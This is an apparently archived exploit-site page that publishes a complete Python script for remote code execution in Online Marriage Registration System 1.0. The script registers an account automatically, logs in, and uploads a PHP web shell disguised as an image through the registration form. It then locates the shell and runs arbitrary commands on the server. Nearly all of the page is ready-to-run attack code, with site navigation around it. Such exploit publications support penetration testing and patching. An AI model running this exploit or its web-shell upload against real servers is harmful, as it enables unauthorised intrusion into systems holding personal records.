exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Online Marriage Registration System 1.0 Remote Code Execution

Online Marriage Registration System 1.0 Remote Code Execution
Posted Feb 11, 2021
Authored by Ricardo Jose Ruiz Fernandez

Online Marriage Registration System (OMRS) version 1.0 remote code execution exploit. Original discovery of remote code execution in this version was discovered by Selim Enes Karaduman in June of 2020.

tags | exploit, remote, code execution
SHA-256 | 0b988c57a1f19668b972345f07ad174bcbd8fba23062032536f90e7035468ee9

Online Marriage Registration System 1.0 Remote Code Execution

Change Mirror Download
# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
# Date: 10/02/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Xampp Server and Wamp Server
# Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file
# Example with registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami'
# Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123

import os
import sys
import random
import argparse
import requests


def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0')
parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration')
parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration')
my_args = parser.parse_args()
return my_args


def login(url, mobile, password):
url = "%s/user/login.php"%(url)
payload = {'mobno':mobile, 'password':password, 'login':''}
req = requests.post(url, data=payload)
return req.cookies['PHPSESSID']


def upload(url, cookie, file=None):
url = "%s/user/marriage-reg-form.php"%url
files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''}
req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files)
print('[+] PHP shell uploaded')


def get_remote_php_files(url):
url = "%s/user/images"%(url)
req = requests.get(url)
php_files = []
for i in req.text.split(".php"):
php_files.append(i[-42:])
return php_files


def exec_command(url, webshell, command):
url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command)
req = requests.get(url_r)
print("[+] Command output\n%s"%(req.text))


def register(mobile, password, url):
url_r = "%s/user/signup.php"%(url)
data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""}
req = requests.post(url_r, data=data)
print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password))


if __name__ == "__main__":
args = get_args()
url = args.url
command = args.command
mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile
password = "dante123" if args.password is None else args.password
if args.password is None or args.mobile is None:
register(mobile,password,url)
cookie = login(url, mobile, password)
initial_php_files = get_remote_php_files(url)
upload(url, cookie)
final_php_files = get_remote_php_files(url)
webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php")
exec_command(url,webshell,command)

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close